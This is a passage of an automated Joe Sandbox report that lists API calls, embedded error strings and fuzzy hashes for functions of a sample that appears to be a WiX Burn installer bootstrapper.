                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F01F7A2A459757AB33162376C0DE7B1D6CFBC3F6AB010114FE25F6181E6544C09C2F2
                                                                                                                                                                                                                                                                            Function 0093C951 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 164registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,?,?,0094526C,00000000,00000000,00000000,00000000,00020019,00000000,00000000,00000000,00020019,00000000,008E6CF2,00000000), ref: 0093C9ED
                                                                                                                                                                                                                                                                            • RegQueryInfoKeyW.ADVAPI32(?,?,?,0094526C,00000000,00000000,00000000,00000000,00020019,00000000,00000000,00000000,00020019,00000000,008E6CF2,00000000), ref: 0093CA1B
                                                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,?,?,0094526C,00000000,00000000,00000000,00000000,00020019,00000000,00000000,00000000,00020019,00000000,008E6CF2,00000000), ref: 0093CAA2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Enum$InfoQuery
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate string bigger for enum registry key.$Failed to allocate string to minimum size.$Failed to determine length of string.$Failed to enum registry key.$Failed to get max size of subkey name under registry key.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 73471667-3057206726
                                                                                                                                                                                                                                                                            • Opcode ID: 28db1a78e2afc7b0592bd2bbebe386d6e82d4d27ecab5dffce139b46e5ca84fd
                                                                                                                                                                                                                                                                            • Instruction ID: 65bd6720d19e6e75143a956a9ff77186d712b422d26f86e8f3e3ca188dcd7836
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 28db1a78e2afc7b0592bd2bbebe386d6e82d4d27ecab5dffce139b46e5ca84fd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A413BB6610628BBEB11DB55CC49FAF7AADEF86B10F124029B608F7240E5709D01DB71
                                                                                                                                                                                                                                                                            Function 00942182 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 161COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(00000000,00000001,00000000,?,00000000,?,00000000,7FFFFFFF,?,00000000,7FFFFFFF,?,00000000,?,00000005,00000000), ref: 009422B9
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                                                            • String ID: Failed to canonicalize the directory.$Failed to canonicalize the path.$Failed to get length of canonicalized directory.$Failed to get length of canonicalized path.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\path2utl.cpp$wzDirectory is required.$wzDirectory must be a fully qualified path.$wzPath is required.
                                                                                                                                                                                                                                                                            • API String ID: 1825529933-3471778437
                                                                                                                                                                                                                                                                            • Opcode ID: 912f375fbca697955fa0964e0c44c1cc3a42c74cde591b0593a80d303c73fffc
                                                                                                                                                                                                                                                                            • Instruction ID: a56f0844a0e8874fdda5d9bf01058689ce5651fecf619830e1e146c08faeda23
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 912f375fbca697955fa0964e0c44c1cc3a42c74cde591b0593a80d303c73fffc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 30411631B80315BAEB209B958C8AFAF66ACFF55F44F904164B714BB1D1E7F48E009651
                                                                                                                                                                                                                                                                            Function 0090D520 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 161sleepwindowCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,00000082,?,?), ref: 0090D55B
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0090D56A
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EB,?), ref: 0090D57E
                                                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 0090D58E
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 0090D59E
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000000FA), ref: 0090D612
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 0090D675
                                                                                                                                                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 0090D6EE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • =======================================, xrefs: 0090D63E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$Long$Proc$MessagePostQuitSleep
                                                                                                                                                                                                                                                                            • String ID: =======================================
                                                                                                                                                                                                                                                                            • API String ID: 305784972-300222271
                                                                                                                                                                                                                                                                            • Opcode ID: e3b75acf3a633a67385657a9b030867c383ed3c9ea2088cee006a7cf1cf2f2b1
                                                                                                                                                                                                                                                                            • Instruction ID: 0830d1ebd562c1f6572379a70e997a0290ac93595b36fedb85b42ee2dc7f2c13
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3b75acf3a633a67385657a9b030867c383ed3c9ea2088cee006a7cf1cf2f2b1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8151F775505114FFCB15AFB8CC8AF6E3A69FF45310F154114FA1EEB1A2DB368D009AA2
                                                                                                                                                                                                                                                                            Function 008ED1D3 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 157COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memcpy_s
                                                                                                                                                                                                                                                                            • String ID: Failed to find variable.$Failed to format variable '%ls' for condition '%ls'$Failed to get if variable is hidden.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$Failed to store formatted value for variable '%ls' for condition '%ls'$d:\a\wix4\wix4\src\burn\engine\condition.cpp$feclient.dll
                                                                                                                                                                                                                                                                            • API String ID: 2001391462-821846985
                                                                                                                                                                                                                                                                            • Opcode ID: 85565413b8b119aa7f99e7e59d42c69620901e0371b02561af6afc66014516bc
                                                                                                                                                                                                                                                                            • Instruction ID: cfcaf6e786706aee43dcaad1f59995a7f08e389d4af3daaed55a413d8b07f6fb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85565413b8b119aa7f99e7e59d42c69620901e0371b02561af6afc66014516bc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF412B7268035477DB229A5B8C4AFAB7A78FB47B14F014115FE00FE2C1E2A1DD1497E2
                                                                                                                                                                                                                                                                            Function 0091A0F4 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 154COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00000000,008E6CF2,00000000,?,?,?,0091A0C7,00000000,008E6CF2,00000000,00000000,00000000), ref: 0091A123
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,0091A0C7,00000000,008E6CF2,00000000,00000000,00000000,?,0091C452,00000000,00000000,00000000,00000000,00000000), ref: 0091A133
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateErrorEventLast
                                                                                                                                                                                                                                                                            • String ID: Failed to append cache action.$Failed to append checkpoint before package start action.$Failed to append rollback cache action.$Failed to create syncpoint event.$Failed to plan cache for package.$Failed to plan package cache syncpoint$d:\a\wix4\wix4\src\burn\engine\plan.cpp
                                                                                                                                                                                                                                                                            • API String ID: 545576003-3436273000
                                                                                                                                                                                                                                                                            • Opcode ID: c06764651f5ea1f3577d8373260a77ffc571051077eba350f4ea4b276d0a68f5
                                                                                                                                                                                                                                                                            • Instruction ID: b114ba7e45f56ebd73097291d48f77d680694286008ead585aaf0aa8d3a143c0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c06764651f5ea1f3577d8373260a77ffc571051077eba350f4ea4b276d0a68f5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4441E771B81728BBE7128B54CC49FEAB6A8AB45B14F110455FD04AF281E3B49D80D7A1
                                                                                                                                                                                                                                                                            Function 008FD5B2 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 149COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000001,80000005,00000000,00000000,00000000,00000000,00000003,000007D0), ref: 008FD752
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to allocate access for Administrators group to path: %ls, xrefs: 008FD605
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\cache.cpp, xrefs: 008FD6DD, 008FD736
                                                                                                                                                                                                                                                                            • Failed to allocate access for SYSTEM group to path: %ls, xrefs: 008FD633
                                                                                                                                                                                                                                                                            • Failed to create ACL to secure cache path: %ls, xrefs: 008FD6E8
                                                                                                                                                                                                                                                                            • Failed to allocate access for Users group to path: %ls, xrefs: 008FD68F
                                                                                                                                                                                                                                                                            • Failed to allocate access for Everyone group to path: %ls, xrefs: 008FD661
                                                                                                                                                                                                                                                                            • Failed to secure cache path: %ls, xrefs: 008FD724
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeLocal
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2826327444-3214910189
                                                                                                                                                                                                                                                                            • Opcode ID: 78295d41b8c86afc125a954cf6a89c25b702f887e5f11ac4de080e0808fad1fc
                                                                                                                                                                                                                                                                            • Instruction ID: e8466ebae4be6ac4cbb5edfb78892ae42b8c9bc259127f686de34185f65cc33c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78295d41b8c86afc125a954cf6a89c25b702f887e5f11ac4de080e0808fad1fc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C410532B8032D76E731A6658C0AFFB6A69FB40F15F114050BB48FE1C1EAE0AD4487E5
                                                                                                                                                                                                                                                                            Function 008E467E Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 143COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(00000000,00000105,?,0100147D,?,00000105,00000000,00000000,0100147D,?,00000000,008E6570), ref: 008E470D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FullNamePath
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate space for full path.$Failed to get current directory.$Failed to get full path for string: %ls$Failed to get max length of input buffer.$Failed to reallocate space for full path.$GetFullPathNameW results never converged.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 608056474-2352071517
                                                                                                                                                                                                                                                                            • Opcode ID: de2d27f921c048c8d671f76a5bf3d64b78a0855a89a8dc7343251aba5c4faa0c
                                                                                                                                                                                                                                                                            • Instruction ID: ad471793de908f78c46d1ae17736262c9efc2b373f3b22a4ccb6731d9a7bdb92
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de2d27f921c048c8d671f76a5bf3d64b78a0855a89a8dc7343251aba5c4faa0c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C941F875B4136E77DB219A5A8C4AFAF3A58FB47B54F121024BD08FB2C1E7B09C0086E0
                                                                                                                                                                                                                                                                            Function 008F0648 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 118COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Directory search: %ls, did not find path: %ls, xrefs: 008F0725
                                                                                                                                                                                                                                                                            • Directory search: %ls, failed get to directory attributes. '%ls', xrefs: 008F0703
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\search.cpp, xrefs: 008F06F3, 008F06F8, 008F0715, 008F0773
                                                                                                                                                                                                                                                                            • Failed to format variable string., xrefs: 008F069E
                                                                                                                                                                                                                                                                            • Failed to initialize file search., xrefs: 008F0671
                                                                                                                                                                                                                                                                            • Directory search: %ls, found file at path: %ls, xrefs: 008F0741
                                                                                                                                                                                                                                                                            • Failed to set variable., xrefs: 008F0761
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Directory search: %ls, did not find path: %ls$Directory search: %ls, failed get to directory attributes. '%ls'$Directory search: %ls, found file at path: %ls$Failed to format variable string.$Failed to initialize file search.$Failed to set variable.$d:\a\wix4\wix4\src\burn\engine\search.cpp
                                                                                                                                                                                                                                                                            • API String ID: 0-1139486771
                                                                                                                                                                                                                                                                            • Opcode ID: ab8a3a8ce0a7d1152cfbc2ca905100b0ccc39b23d6ba197f4632870f4f499d75
                                                                                                                                                                                                                                                                            • Instruction ID: e7cdf83d7141892ac157e404b6fbe02db10f005facfa411491436a6b18f0a051
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab8a3a8ce0a7d1152cfbc2ca905100b0ccc39b23d6ba197f4632870f4f499d75
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04312931A412297FDB11AAB98C4AF7EBA68FF04715F110251FF10F6192E271A8109F91
                                                                                                                                                                                                                                                                            Function 008F08D7 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 118COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • File search: %ls, did not find path: %ls, xrefs: 008F09B4
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\search.cpp, xrefs: 008F0982, 008F0987, 008F09A4, 008F0A02
                                                                                                                                                                                                                                                                            • Failed to format variable string., xrefs: 008F092D
                                                                                                                                                                                                                                                                            • File search: %ls, failed get to file attributes. '%ls', xrefs: 008F0992
                                                                                                                                                                                                                                                                            • Failed to initialize file search., xrefs: 008F0900
                                                                                                                                                                                                                                                                            • Failed to set variable., xrefs: 008F09F0
                                                                                                                                                                                                                                                                            • File search: %ls, found directory at path: %ls, xrefs: 008F09D0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Failed to format variable string.$Failed to initialize file search.$Failed to set variable.$File search: %ls, did not find path: %ls$File search: %ls, failed get to file attributes. '%ls'$File search: %ls, found directory at path: %ls$d:\a\wix4\wix4\src\burn\engine\search.cpp
                                                                                                                                                                                                                                                                            • API String ID: 0-1703314674
                                                                                                                                                                                                                                                                            • Opcode ID: c4aa766ff84a6c73a3d75d9eab01a9da813e44c043c12fbed6d68ef32391df83
                                                                                                                                                                                                                                                                            • Instruction ID: 01b3775aff52985465cef3bc0960275fddb5d724200821b0c70316b3351e2cde
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c4aa766ff84a6c73a3d75d9eab01a9da813e44c043c12fbed6d68ef32391df83
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2310772B40629BEEB119AA98C4AF7EBE68FF05754F110121BF04F6193F2F09C109B91
                                                                                                                                                                                                                                                                            Function 008FA07C Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 108COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000008,?,00000000,00000000,00000000,00000000,00000008,?,00000000,00000000,?,?), ref: 008FA0C3
                                                                                                                                                                                                                                                                            • ProcessIdToSessionId.KERNEL32(00000000), ref: 008FA0CA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\logging.cpp, xrefs: 008FA183
                                                                                                                                                                                                                                                                            • Failed to copy temp folder., xrefs: 008FA171
                                                                                                                                                                                                                                                                            • Failed to format session id as a string., xrefs: 008FA0F2
                                                                                                                                                                                                                                                                            • %u\, xrefs: 008FA0DE
                                                                                                                                                                                                                                                                            • Failed to get length of session id string., xrefs: 008FA11D
                                                                                                                                                                                                                                                                            • Failed to get temp folder., xrefs: 008FA0A8
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process$CurrentSession
                                                                                                                                                                                                                                                                            • String ID: %u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get temp folder.$d:\a\wix4\wix4\src\burn\engine\logging.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2701954971-2959569260
                                                                                                                                                                                                                                                                            • Opcode ID: a62ca31bff3d5371b42b0b1b983ebc32f0d7723fe97b884d82aae04c6e96511d
                                                                                                                                                                                                                                                                            • Instruction ID: f3fa62b861777267ab9b8bf7ff36a7a22574ece52818cdeacea5bbaac06b2658
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a62ca31bff3d5371b42b0b1b983ebc32f0d7723fe97b884d82aae04c6e96511d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E931C5B1E4022DBADF11DAA5CC09EAFBBB8FF45750F110151BA05F6291E6B09A40DB92
                                                                                                                                                                                                                                                                            Function 00943A62 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 94fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,00000080,00000001,00000000,00000003,00000080,00000000,?,00000000,00000000,?,0092262E,00000000,00000000,00000000,?), ref: 00943AAF
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0092262E,00000000,00000000,00000000,?,?,?,0091EE7E,458BF88B,?,?,?,00000000,00000000,?), ref: 00943ABC
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0092262E,00000000,00000000,00000000,?,?,?,0091EE7E,458BF88B,?,?,?,00000000,00000000,?), ref: 00943ACE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
